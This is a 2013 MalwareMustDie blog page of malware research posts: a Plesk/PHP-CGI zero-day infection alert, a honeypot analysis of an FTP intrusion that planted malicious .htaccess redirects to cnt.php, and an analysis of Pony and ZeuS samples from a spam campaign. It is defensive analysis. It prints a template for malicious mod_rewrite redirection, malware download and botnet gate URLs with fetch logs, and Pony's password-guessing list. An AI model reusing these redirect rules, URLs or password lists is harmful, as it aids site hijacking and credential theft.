2. Our friend found new landing page, we decoded here-->>[MMD Pastebin]

#MalwareMustDie!

Friday, June 7, 2013

MMD-0000-2013 - Malware Infection Alert on Plesk/Apache Remote Code Execution zeroday vulnerability

Summary:

This zeroday PoC (thank to KingCope for announcing the zeroday, a great share!) is bringing a huge impact in the worse timing of malware web infection trends, which the botnet via file injection already ITW & spotted (salute to RepoCERT) so we find it necessary to quick posting the vulnerability clarification here (via @unixfreaxjp), and a short memo in here about this threat due to mitigate the infection vector.

The vulnerability impact is a remote flaw of previously detected in PHP's CGI Remote Code Execution of Arbitrary Code (with can be used to trigger flaw of remote file upload) of CVE-2012-1823 (here's the CVE's info link) which can be remotely executed by direct request (ok, to cut the crap: I mean exploitation PoC code via POST command) without using the PHP file as interpreter intact, which is currently severe zeroday flaw that has to be fixed by Plesk panels (the PoC's affected/tested version is 8.6, 9.0, 9.2, 9.3, 9.5.4 and the unaffected version is 11.0.9) in their way of configuring web server with ScriptAlias /phppath/ "/usr/bin/".

To be noted. The malware spotted so far, as per spotted by RepoCERT, are IRC/BOT of these variant which are mostly the script kiddies levels that is having DDoS functionality, with is written the comment traces of Portuguese language inside. It is about time for other serious malware web infection base (like redirector/backdoor) to utilize this flaw for spreading their malware infection links/urls either by exploit kits (or direct) basis, to all of us to please be aware to patch your Plesk panel's version.

As mitigation is advised implement a custom rule to block an unnecessary direct connection via/through IRC ports to remote hots from the affected hosts (Noted: not afected web servers, nor domains, but hosts). For the checking and cleaning purpose RepoCERT is sharing their cleaning & removal script tools here and here.

Malware functionality detected of current spotted samples

Identification of the attacker via IRC channel:

DoS functionality:

Backdoor-1 File send to remote host via IRC:

Backdoor-2 Encoded notification of affected host:

PoC leaked in news links:

The IT news for this zeroday is wide-spreaded before Plesk patch the flaw, many of the news has the pastes of the exploit PoC that can be used to attack the affected Plesk panels, please be aware of this too. Th elink is as per follows:

[1] Ars Technica: More than 360,000 Apache websites imperiled by critical Plesk vulnerability (Updated)
[2] Heise Security: Angeblicher Zero-Day-Exploit für Plesk
[3]
WebWereld: Exploit pakt Apache via vers gat in Plesk-beheerpanel
[4] PCWorld: Hacker publishes alleged zero-day exploit for older Plesk versions
[5] Parity News: Hacker publishes alleged zero-day exploit for Plesk
[6] H-Online: Supposed zero-day exploit for Plesk - Update

#MalwareMustDie!

Wednesday, June 5, 2013

A mistery of Malware URL "cnt.php" Redirection Method with Apache's mod_rewrite.c's RewriteCond in .htaccess

Summary

To be honest, since knowing that most of linux malware are blocking my IP & and my country's access, I changed my strategy to invite and trap them with the honeypot method for a dummy server to let them come and attack. (I think) I was preparing it good.. but after some time without anything happened I was thinking this strategy wasn't working well AAND...! Today by swatch script poke me with email for having a visitor. Checking the site to know it was actually visited two times but it looks like I did not get alert for the first one for I forgot to activate swatch into cron :-(

Code Injection in web contents and .htaccess

Shortly, this visitor is not friendly, he changed the root's index pages and fake javascript files into the ones with the obfuscated injected codes as per below:

With we can decode it easily into this:

It is the code of redirection using the special condition of cookies. This cookie will determine conditions to trigger a prepared action in the redirection destination php page (which at this moment only God knows what).

Moving along.. Seeing the decoded code result reminding me of the recent Darkleech poking script in their injected sites. So with the grateful feeling to this visitor I was seeking further I found the .htaccess with the below code:

At this time I feel sad to face the fact that this is only a common hacking method (honestly, I expected cooler stuffs like the latest Darkleech or RedKits or maybe cDorked..sigh!) of using mod_rewrite.c for the site's redirection. The mod_rewrite is an Apache module that allows the seamless (to the client) redirection of files, reference -->>[APACHE.ORG]. Where the mod_rewrite.c's RewriteEngine which is turned off in the most Apache web server's default setting, was switched ON and adding RewriteCond command to make condition to redirect the separated piped delimitered keywords HTTP request to the specific file/site/url mentioned above.

This "incident" is actually using a common usage of mod_rewrite.c by most webapp programmer to redirect all get request to index.php if the requested file of dir does not exists, with the format below:

<IfModule mod_rewrite.c>
   RewriteEngine On
   RewriteBase /
   RewriteRule ^index\.php$ - [L]
   RewriteCond %{REQUEST_FILENAME} !-f
   RewriteCond %{REQUEST_FILENAME} !-d
   RewriteRule . /index.php [L]
</IfModule>  
Hacker moronz are mostly using mod_rewrite.c with the below format for evil redirection:
   RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing|keyword-eetc1|keyword-eetc2) [OR]
   RewriteCond %{HTTP_REFERER} (google|yahoo|bing|keyword-etc1|keyword-eetc2)
   RewriteCond %{REQUEST_URI} /$ [OR]
   RewriteCond %{REQUEST_FILENAME} (html|htm|php|cgi|)$ [NC]
   RewriteCond %{REQUEST_FILENAME} !FILENAME-TO-HANDLE-REQUEST.(php|cgi)
   RewriteCond FILENAME-TO-HANDLE-REQUEST.(php|cgi) -f
   RewriteRule ^.*$ /FILENAME-TO-HANDLE-REQUEST.(php|cgi) [L]

Attack Source IP

The log shows the IP access source of the attacker:

   71.89.72.41
   83.138.146.85
   82.98.131.102
   117.26.78.57
The GeoIP shows these location:

FTP logs of the attack - An Automation Trace

All of the access by this moronz visitor is through the FTP event log as per below, which is the clue in the systematic hacking a web server traces, which is suggested the tools/script usage/involvement:

// EVENT #1:

[2013/06/01 21:46:54] 71.89.72.41:   C="PASS (hidden)" B=- S=530
[2013/06/01 21:46:55] 83.138.146.85: C="USER USERNAME" B=- S=331
[2013/06/01 21:46:55] 83.138.146.85: C="PASS (hidden)" B=- S=230
[2013/06/01 21:46:55] 83.138.146.85: C="SYST" B=- S=215
[2013/06/01 21:46:55] 83.138.146.85: C="LIST /" D= B=211 S=226
[2013/06/01 21:46:56] 83.138.146.85: C="LIST public_html/" D= B=630 S=226
[2013/06/01 21:46:56] 83.138.146.85: C="LIST public_html/data/" D= B=124 S=226
[2013/06/01 21:46:57] 83.138.146.85: C="LIST public_html/images/" D= B=1219 S=226
[2013/06/01 21:46:57] 83.138.146.85: C="STOR public_html//KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:57] 83.138.146.85: C="STOR public_html/cgi-bin/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="STOR public_html/data/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="STOR public_html/images/KJQb9RkC.gif" F=- B=- S=552 T=-
[2013/06/01 21:46:58] 83.138.146.85: C="RETR public_html//index.html" F=/public_html/index.html B=10486 S=226 T=0.199
[2013/06/01 21:46:59] 83.138.146.85: C="STOR public_html//index.html" F=- B=- S=- T=-
[2013/06/01 21:46:59] 83.138.146.85: C="RETR public_html/index.html" F=- B=- S=550 T=-
[2013/06/01 21:47:00] 83.138.146.85: C="RETR public_html/index.html-1" F=/public_html/index.html-1 B=7484 S=226 T=0.189
[2013/06/01 21:47:00] 83.138.146.85: C="STOR public_html/index.html-1" F=- B=- S=- T=-
[2013/06/01 21:47:00] 83.138.146.85: C="RETR public_html/TRAP.JS" F=/public_html/TRAP.JS B=2586 S=226 T=0.113
[2013/06/01 21:47:00] 83.138.146.85: C="STOR public_html/TRAP.JS" F=- B=- S=- T=-
[2013/06/01 21:47:01] 83.138.146.85: C="RETR public_html/TRAP.JS" F=/public_html/TRAP.JS B=2323 S=226 T=0.117
[2013/06/01 21:47:01] 83.138.146.85: C="STOR public_html/TRAP.JS" F=- B=- S=- T=-
[2013/06/01 21:47:02] 83.138.146.85: C="RETR public_html/data/.htaccess" F=/public_html/data/.htaccess B=125 S=226 T=0.141
[2013/06/01 21:47:02] 83.138.146.85: C="STOR public_html/data/.htaccess" F=- B=- S=- T=-

// EVENT #2:

[2013/06/04 11:53:05] 82.98.131.102: C="USER USERNAME" B=- S=331
[2013/06/04 11:53:05] 82.98.131.102: C="PASS (hidden)" B=- S=230
[2013/06/04 11:53:05] 82.98.131.102: C="SYST" B=- S=215
[2013/06/04 11:53:05] 117.26.78.57: C="PASS (hidden)" B=- S=530
[2013/06/04 11:53:06] 82.98.131.102: C="LIST public_html/" D= B=562 S=226
[2013/06/04 11:53:07] 82.98.131.102: C="STOR public_html//X9W7N2fm.gif" F=/public_html/X9W7N2fm.gif B=10 S=226 T=0.159
[2013/06/04 11:53:24] 82.98.131.102: C="DELE public_html//X9W7N2fm.gif" F=/public_html/X9W7N2fm.gif B=10 S=250 T=-
[2013/06/04 11:53:24] 82.98.131.102: C="STOR public_html/cgi-bin/X9W7N2fm.gif" F=/public_html/cgi-bin/X9W7N2fm.gif B=0 S=226 T=0.138
[2013/06/04 11:53:41] 82.98.131.102: C="DELE public_html/cgi-bin/X9W7N2fm.gif" F=/public_html/cgi-bin/X9W7N2fm.gif B=0 S=250 T=-
[2013/06/04 11:53:41] 82.98.131.102: C="STOR public_html/data/X9W7N2fm.gif" F=/public_html/data/X9W7N2fm.gif B=0 S=226 T=0.153
[2013/06/04 11:53:58] 82.98.131.102: C="DELE public_html/data/X9W7N2fm.gif" F=/public_html/data/X9W7N2fm.gif B=0 S=250 T=-
[2013/06/04 11:53:58] 82.98.131.102: C="STOR public_html/images/X9W7N2fm.gif" F=/public_html/images/X9W7N2fm.gif B=0 S=226 T=0.132
[2013/06/04 11:54:15] 82.98.131.102: C="DELE public_html/images/X9W7N2fm.gif" F=/public_html/images/X9W7N2fm.gif B=0 S=250 T=-
[2013/06/04 11:54:16] 82.98.131.102: C="STOR public_html//index.html" F=/public_html/index.html B=15011 S=226 T=0.363
[2013/06/04 11:54:17] 82.98.131.102: C="RETR public_html/index.html" F=/public_html/index.html B=15011 S=226 T=0.363
[2013/06/04 11:54:17] 82.98.131.102: C="STOR public_html/TRAP.JS" F=/public_html/TRAP.JS B=6906 S=226 T=0.235
[2013/06/04 11:54:18] 82.98.131.102: C="STOR public_html/TRAP.JS" F=/public_html/TRAP.JS B=6711 S=226 T=0.234
[2013/06/04 11:54:19] 82.98.131.102: C="STOR public_html/data/.htaccess" F=/public_html/data/.htaccess B=1821 S=226 T=0.161

Cookie and Redirection to cnt.php

The redirection URL is an interesting story, upon a direct access you'll get the "ok" data as per below:

--2013-06-05 03:26:36--  h00p://52weeksnc.com/cnt.php
Resolving 52weeksnc.com... seconds 0.00, 74.208.121.185
Caching 52weeksnc.com => 74.208.121.185
Connecting to 52weeksnc.com|74.208.121.185|:80... seconds 0.00, connected.
  :
GET /cnt.php HTTP/1.0
User-Agent: MalwareMustDie Ranted: Thou Salt Not Do (stupid) Hack!
Host: 52weeksnc.com
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Tue, 04 Jun 2013 18:26:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
  :
200 OK
Length: unspecified [text/html]
Saving to: `cnt.php'
2013-06-05 03:26:37 (21.3 KB/s) - `cnt.php' saved

$ cat cnt.php
ok
By the browser we'll see:

It doesn't show nothing else but the "ok" at this point, but actually no one would like to hack for just redirecting your site into an "ok" wouldn't we? Thank's to Amanda Pessi for the idea about cookie used-->>See comment part

Redirection Target's IP Reputation

The IP reputation is not so good, recorded badly to be used by the below "suspected" domains:

52weeksnc.com
williamstyler.com
www.trojanremovalguide.com
With the below PoC:
[1] [2] [3] [4]

The domain information used is suggesting a hacked domains, for the info's:

Domain Name: 52WEEKSNC.COM
Registrar: 1 & 1 INTERNET AG
Whois Server: whois.schlund.info
Referral URL: http://1and1.com
Name Server: NS51.1AND1.COM
Name Server: NS52.1AND1.COM
Status: ok
Updated Date: 09-jul-2012
Creation Date: 09-jul-2012
Expiration Date: 09-jul-2013

domain:                          52weeksnc.com
created:                         09-Jul-2012
last-changed:                    09-Jul-2012
registration-expiration:         09-Jul-2013
nserver:                         ns51.1and1.com 217.160.80.164
nserver:                         ns52.1and1.com 217.160.81.164
status:                          CLIENT-TRANSFER-PROHIBITED

registrant-firstname:            Oneandone
registrant-lastname:             Private Registration
registrant-organization:         1&1 Internet, Inc. - http://1and1.com/contact
registrant-street1:              701 Lee Road, Suite 300
registrant-street2:              ATTN: 52weeksnc.com
registrant-pcode:                19087
registrant-state:                PA
registrant-city:                 Chesterbrook
registrant-ccode:                US
registrant-phone:                +1.8772064254
registrant-email:                proxy3497318@1and1-private-registration.com

AntiVirus Detection

Below is the scanning for detection ratio of the each samples via Virus Total:

1. Malicious Injected .htaccess:

SHA256:3b5e77fd3001f8040c308b751c2760c8aac0d0d8fe18a6abd98a93fa1b6497af
SHA1: c1925dcc1dc47b70bc62598d0c51312c5a256fa5
MD5: 5c65e586af2db49d7b93a1197734e82f
File size: 1.8 KB ( 1830 bytes )
File name: .htaccess
File type: Text
Tags: text
Detection ratio: 0 / 46
Analysis date: 2013-06-05 10:48:49 UTC ( 5 minutes ago )
Looks like there is no product can detect the injected .htaccess, detection ratio is zero.

2. Injected Code (in Obfuscation)

SHA256: 8fa82809fb7f7c346188740cc71c86efa9419b536923159be39ad91f011f6c98
SHA1: 9f39f4875427ea3ec2b22182b8d34d5bf3c5574d
MD5: 95cfe5fc34b10272e9408517336b4cd3
File size: 4.3 KB ( 4389 bytes )
File name: obfuscation-redir-code.txt
File type: Text
Tags: text
Detection ratio: 16 / 47
Analysis date: 2013-06-05 10:49:08 UTC ( 7 minutes ago )

F-Secure                 : JS:Trojan.Crypt.MT
Microsoft                : Trojan:JS/BlacoleRef.DH
AntiVir                  : JS/BlacoleRef.CZ.20
Norman                   : Redirector.JX
McAfee-GW-Edition        : JS/Exploit-Blacole.ht
Avast                    : JS:Redirector-AOW [Trj]
nProtect                 : JS:Trojan.Crypt.MT
CAT-QuickHeal            : JS/BlacoleRef.CZB
Kaspersky                : Trojan.JS.Iframe.aen
BitDefender              : JS:Trojan.Crypt.MT
NANO-Antivirus           : Trojan.Script.Expack.brblya
McAfee                   : JS/Exploit-Blacole.ht
Fortinet                 : HTML/IFrame.AHQ!tr.dldr
GData                    : JS:Trojan.Crypt.MT
Emsisoft                 : JS:Trojan.Crypt.MT (B)
Comodo                   : Exploit.JS.Blacole.CW
This sample's detection ratio, is not bad, but too bad that ClamAV, Sophos & Symantec can't detect it.. some of unix system I know are using them..

3. Injected Code (The Decode Version)

SHA256: 2b09050a02f996fc5dd9203a289ce60b41a885877da1edbdc36c2f3a4a36b631
SHA1: 35945fd0667a21b94f8a7e4cb0763a588de1c9bd
MD5: ce012905dc63ef14b619cdef98157949
File size: 1.3 KB ( 1338 bytes )
File name: decoded-redir-code.txt
File type: Text
Tags: text
Detection ratio: 10 / 47
Analysis date: 2013-06-05 10:49:26 UTC ( 10 minutes ago )

F-Prot                   : JS/IFrame.RS.gen
AntiVir                  : HTML/ExpKit.Gen3
Avast                    : JS:Iframe-AHW [Trj]
GData                    : JS:Iframe-AHW
Kaspersky                : HEUR:Trojan.Script.Generic
NANO-Antivirus           : Trojan.Script.Iframe.bopaxv
Fortinet                 : JS/Iframe.DCV!tr.dldr
Commtouch                : JS/IFrame.RS.gen
K7AntiVirus              : Riskware
AVG                      : HTML/Framer
This sample's detection ratio is only 10. Surprisingly the plain decoded version of the obfuscated injection code can not be detected by 6 products that could detect them previously, the reason is obvious, detection ratio described above are signature base only. That's it for VT, let's check/scan it by the beloved rkhunter...

Grabbed the latest version & updated the database..

$ date
Wed Jun  5 20:20:37 JST 2013

$ sudo /usr/local/bin/rkhunter --update
[ Rootkit Hunter version 1.4.0 ]

Checking rkhunter data files...
  Checking file mirrors.dat                                  [ No update ]
  Checking file programs_bad.dat                             [ No update ]
  Checking file backdoorports.dat                            [ No update ]
  Checking file suspscan.dat                                 [ No update ]
  Checking file i18n/cn                                      [ No update ]
  Checking file i18n/de                                      [ No update ]
  Checking file i18n/en                                      [ No update ]
  Checking file i18n/zh                                      [ No update ]
  Checking file i18n/zh.utf8                                 [ No update ]
Put the injection code & .htaccess files in the path to be scanned by rkhunter and runs it:
Performing check of known rootkit files and directories
    55808 Trojan - Variant A                                 [ Not found ]
    ADM Worm                                                 [ Not found ]
    AjaKit Rootkit                                           [ Not found ]
    Adore Rootkit                                            [ Not found ]
    aPa Kit                                                  [ Not found ]
    Apache Worm                                              [ Not found ]
    Ambient (ark) Rootkit                                    [ Not found ]
    Balaur Rootkit                                           [ Not found ]
    BeastKit Rootkit                                         [ Not found ]
    beX2 Rootkit                                             [ Not found ]
    BOBKit Rootkit                                           [ Not found ]
       [...]                                                     [...]
    Trojanit Kit                                             [ Not found ]
    Turtle Rootkit                                           [ Not found ]
    Tuxtendo Rootkit                                         [ Not found ]
    URK Rootkit                                              [ Not found ]
    Vampire Rootkit                                          [ Not found ]
    VcKit Rootkit                                            [ Not found ]
    Volc Rootkit                                             [ Not found ]
    Xzibit Rootkit                                           [ Not found ]
    zaRwT.KiT Rootkit                                        [ Not found ]
    ZK Rootkit                                               [ Not found ]
Performing additional rootkit checks
    Checking for possible rootkit files and directories      [ None found ]
       [...]                                                     [...]
Yes, rkhunter cannot detect these threat.

How many more cnt.php threat are in the internet now?

Today our team detected the below redirection of cnt.php:

[...]
05.06.13 00:12 - brandt-siefart.de/cnt.php - 87.106.116.213 - Referrer: h00p://ibc2013.org/
05.06.13 00:14 - miltonrefs.ca/minutes/cnt.php - 96.125.166.238 - Referrer: 
05.06.13 00:17 - www.vmix.cz/sqc/cnt.php - 46.28.105.60 - Referrer: h00p://gezondeogen.nl/
05.06.13 00:23 - krakownoclegi.org/cnt.php - 62.75.153.123 - Referrer: h00p://www.meineaktion.de/browse_all_end.php?SESSION_ID=c89652a733c34b3ee927fb9b923c8afd
05.06.13 00:28 - fraukesart.de/cnt.php - 80.67.28.150 - Referrer: h00p://www.druckerei-daemmig.de/favicon.ico
05.06.13 00:48 - www.baru.it/cnt.php - 62.149.142.35 - Referrer: h00p://karbon4ik.ru/novosti/gai
05.06.13 01:21 - markbruinink.nl/wp-admin/cnt.php - 46.244.13.6 - Referrer: h00p://magaliescountryhotel.co.za/
05.06.13 02:00 - 52weeksnc.com/cnt.php - 74.208.121.185 - Referrer: h00p://google.com/
05.06.13 02:02 - www.vmix.cz/sqc/cnt.php - 46.28.105.60 - Referrer: h00p://www.gezondeogen.nl/
05.06.13 02:12 - www.baru.it/cnt.php - 62.149.142.35 - Referrer: h00p://karbon4ik.ru/novosti/page/2
05.06.13 02:15 - www.zaxtv.net/wp-admin/cnt.php - 97.74.215.167 - Referrer: h00p://facilitec.com/
05.06.13 02:38 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/welcome/about/brittney-pokorzynski/
05.06.13 03:21 - 52weeksnc.com/cnt.php - 74.208.121.185 - Referrer: 
05.06.13 03:24 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/2011/03/24/big-news/
05.06.13 03:25 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/remodeling/
05.06.13 04:00 - www.mickmusic.eu/cnt.php - 79.99.164.4 - Referrer: 
05.06.13 04:02 - www.mickmusic.eu/cnt.php - 79.99.164.4 - Referrer: 
05.06.13 04:14 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/testimonials/resources/
05.06.13 04:27 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/2010/12/02/this-is-a-test/
05.06.13 04:34 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/category/tips/
05.06.13 04:36 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/2012/04/10/no-time-better-than-now/
05.06.13 04:50 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/category/news/
05.06.13 05:03 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/category/staging-2/
05.06.13 05:06 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/welcome/about/
05.06.13 05:09 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/contact/
05.06.13 05:26 - 213.198.109.117/installationx/cnt.php - 213.198.109.117 - Referrer: h00p://www.homestaginggr.com/staging/rental-inventory
The overall redirection of cnt.php logged is a bit big, so please see it in this pastebin here-->>[Pastebin] (Big thank's to @Set_Abominae for the sorts). The name itself "cnt.php" is faking the good counter filename commonly used in PHP programming, suspected set to avoid the tracing purpose. So dorking the sites with "cnt.php" in Google will br resulted into a huge False Positive.

Epilogue

So if you read this post and you can enlighten us with the cookies and cnt.php matter (we know pretty well about mod_rewrite.c redirection matter, thank you) please poke me in twitter or write the comment. This case is not new and happened a lot in our beloved internet, Sucuri Labs has a good database on these injection & redirection, the link is here-->>[Google Dork]. In addition, if you happens to be infected/injected, Alex (Aliaksandr Hartsuyeu) of eVuln.com is writing a good tutorial on "Malicious Redirects - Common Fixing Guide v1" here-->>[eVuln.com]

Furthermore, I really hope to be visited by the other "visitor" next time, so stay tuned! :-)

PS: really feels GOOD to hear a moronz cried after I posted this. :D

#MalwareMustDie!

Tuesday, June 4, 2013

Case of Pony downloading ZeuS via Passworded Zip Attachment of Malvertisement Campaign

Is a workdays so I can not post much so please bear with the below short analysis. But today I can't get rid of my curiosity when reading Mr. Conrad Longmore's newest post on Dynamoo Blog (nice report!) about the malvertisement with encrypted/passworded zip attachment (here's the link -->>[Dynamoo Blog]).
I got lucky to have the similar sample by today's date in my honeypot as per following snapshot and just can't help to take a look into it..

The email header shows the spambot signatures:
Date: Mon, 3 Jun 2013 09:45:57 -0800
From: "Fiserv Secure Notification" 
User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20110929 Thunderbird/7.0.1"
MIME-Version: 1.0
And the passworded archive as attachment like the below snapshot:

And by filling the provided information will lead you to the sample here-->>[VirusTotal]
This time it looks like Virus Total was making limited behavior analysis on the sample so I decided to check it myself.

I renamed the malicious attachment with the filename sample2.exe and runs it, as per seen in the decrypt binary code it connected to the below pony gateways:

h00p://116.122.158.195:8080/ponyb/gate.php
h00p://nourrirnotremonde.org/ponyb/gate.php
h00p://zoecopenhagen.com/ponyb/gate.php
h00p://goldenstatewealth.com/ponyb/gate.php
OK, is a pony trojan, a credential stealer & downloader. It downloaded other malwares from th ebelow url set (gotta hack the bins to know these too), later on I know is Zbot:
h00p://www.netnet-viaggi.it/2L6L.exe
h00p://190.147.81.28/yqRSQ.exe
h00p://paulcblake.com/ngY.exe
h00p://207.204.5.170/PXVYGJx.exe
The processes after downloading is becoming like:

With some successful downloaded logs I recorded (for evidence purpose):
--2013-06-04 17:40:46--  h00p://190.147.81.28/yqRSQ.exe
Connecting to 190.147.81.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305664 (299K) [application/x-msdownload]
Saving to: `yqRSQ.exe'
100%[=====================>] 305,664     95.4K/s   in 3.1s
2013-06-04 17:40:51 (95.4 KB/s) - `yqRSQ.exe' saved [305664/305664]

--2013-06-04 17:40:59--  h00p://paulcblake.com/ngY.exe
Resolving paulcblake.com... 74.54.147.146
Connecting to paulcblake.com|74.54.147.146|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305664 (299K) [application/x-msdownload]
Saving to: `ngY.exe'
100%[=====================>] 305,664      144K/s   in 2.1s
2013-06-04 17:41:02 (144 KB/s) - `ngY.exe' saved [305664/305664]

--2013-06-04 17:41:15--  h00p://207.204.5.170/PXVYGJx.exe
Connecting to 207.204.5.170:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 305664 (299K) [application/x-msdownload]
Saving to: `PXVYGJx.exe'
100%[=====================>] 305,664      109K/s   in 2.7s
2013-06-04 17:41:18 (109 KB/s) - `PXVYGJx.exe' saved [305664/305664]
And then the daemonized of pony malware started:

You'll see the self-copied traces on the original malware (pony) and the downloaded one saved in the %Temp% and %AppData% as per below snapshot, noted the randomized in file names and the fake dates:

So we have actually two malwares in this case, the attached file is ZeuS-based PWS/pony botnet agent which downloading the trojan PWS/Stealer. Let's break it down one by one.

The Pony

The binary is compressed by aPLib v1.01, traces is here:

aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
It checked some basic info on your system "System Data.."
GetNativeSystemInfo
IsWow64Process
HWID

"... and User's Data"
My Documents
AppData
Local AppData
Cache
Cookies
History
My Documents
Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
[...]
Then tried to grab your FTP Softwares, Browsers, Email, Terminal server, File sharing credential data like as per I pasted in pastebin here -->>[Pastebin]

Even attempt on accessing the facebook related data。The code was readable :-)

xthpt/:w/wwf.cabeoo.koc/m
// Means:
http://www.facebook.com/
HTTP/1.0 POST communication's header decoded:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HTTP/1,0 GET communication's header coded:
GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s
String for logins :-)
diamond        jason          scooby         thomas     maxwell        whatever       cheese         asdf    
hope           internet       joseph         blink182   justin         god            sunshine       banana  
maggie         mustdie        genesis        jasmine    james          password       christ         gates   
maverick       john           forum          purple     chicken        blessing       soccer         flower  
online         letmein        emmanuel       test       danielle       snoopy         qwerty1        taylor  
spirit         mike           cassie         angels     iloveyou2      1q2w3e4r       friend         lovely  
george         knight         victory        grace      fuckoff        cookie         summer         hannah  
friends        jordan23       passw0rd       hello      prince         chelsea        merlin         princess
dallas         abc123         foobar         poop       junior         pokemon        phpbb          compaq  
adidas         red123         ilovegod       blessed    rainbow        hahaha         jordan         jennifer
1q2w3e         praise         nathan         heaven     fuckyou1       aaaaaa         saved          myspace1
orange         freedom        blabla         hunter     nintendo       hardcore       dexter         smokey  
testtest       jesus1         digital        pepper     peanut         shadow         viper          matthew 
asshole        london         peaches        john316    none           welcome        winner         harley  
apple          computer       football1      cool       church         mustang        sparky         rotimi  
biteme         microsoft      power          buster     bubbles        bailey         windows        fuckyou 
william        muffin         thunder        andrew     robert         blahblah       123abc         soccer1 
mickey         qwert          gateway        faith      destiny        matrix         lucky          single  
asdfgh         mother         iloveyou!      ginger     loving         jessica        anthony        joshua  
wisdom         master         football       hockey     gfhjkm         stella         jesus          green   
batman         qazwsx         tigger         hello1     mylove         benjamin       ghbdtn         123qwe  
michelle       samuel         corvette       angel1     jasper         testing        admin          starwars
david          canada         angel          superman   hallo          secret         hotdog         love    
eminem         slayer         killer         enter      cocacola       trinity        baseball       silver  
scooter        rachel         creative       daniel     helpme         richard        password1      austin  
asdfasdf       onelove        google         forever    nicole         peace          dragon         michael 
sammy          qwerty         zxcvbnm        nothing    guitar         shalom         trustno1       amanda  
baby           prayer         startrek       dakota     billgates      monkey         chris          charlie 
samantha       iloveyou1      ashley         kitten     looking        iloveyou       happy          bandit  
Malicious WSA base botnets calls used:
Client Hash
STATUS-IMPORT-OK
gethostbyname
socket
connect
closesocket
send
select
recv
setsockopt
Some PoC of request vs response of this binary's networking:

The Stealer is... Trojan ZeuS Botnet Agent (Zbot)

I analyzed sample like this in the recent popular malvertisement campaign like I pasted it here -->>[Pastebin]. This one is one of the kind, with the below highlights:

Process injection target:

launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
Usual strings:
bancline
fidelity
micrsolv
bankman
vantiv
episys
jack henry
cruisenet
gplusmain
Encoding ROT traces:
abcdefghijklmnopqrstuvwxyz
^_`abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
|$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Botnet connectivity by HTTP/1.1, also as per previous sample's has:
GET
HTTP/1.1
Connection: Close
Authorization
Basic 
GET 
POST 
div
script
nbsp;
connection
proxy-connection
content-length
transfer-encoding
upgrade
chunked
keep-alive
close
Botnet commands:
DELETE
HEAD
PUT
CONNECT
OPTIONS
TRACE
COPY
LOCK
MKCOL
MOVE
PROPFIND
PROPPATCH
SEARCH
UNLOCK
REPORT
MKACTIVITY
CHECKOUT
MERGE
M-SEARCH
NOTIFY
SUBSCRIBE
UNSUBSCRIBE
PATCH
PURGE
Here's the VT's detection ratio for the zbot, is too darn low:
URL is here -->>[VirusTotal]
SHA256:40b4fa7433319d2b4d2fc8e8265547665e6492d3d64d0ecc2b30108b8d732a1c
SHA1: 4f3fda6c688c11a2a15bf88fb1ff005dc0045324
MD5: aa8463f91cd44a436d2468b33c2cafbb
File size: 298.5 KB ( 305664 bytes )
File name: PXVYGJx.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 2 / 47
Analysis date: 2013-06-04 08:46:46 UTC ( 2 hours, 55 minutes ago )

Fortinet                 : W32/Kryptik.AGAJ!tr
McAfee-GW-Edition        : Heuristic.LooksLike.Win32.Suspicious.B

Overall Network Analysis (To aim CnC)

A set of this infection will make an outbound traffic like this:
Which is showing the Zbot trojan downloader hosts below:

With the unique DNS requests as below:

Incoming UDP via local port 25916 are detected from below IP:

81.133.189.232
95.234.169.221
211.209.241.213
63.85.81.254
108.215.44.142
142.136.161.103
PoC:

These are the source information:
Additionally, this is how our data got sent to the pony panels:
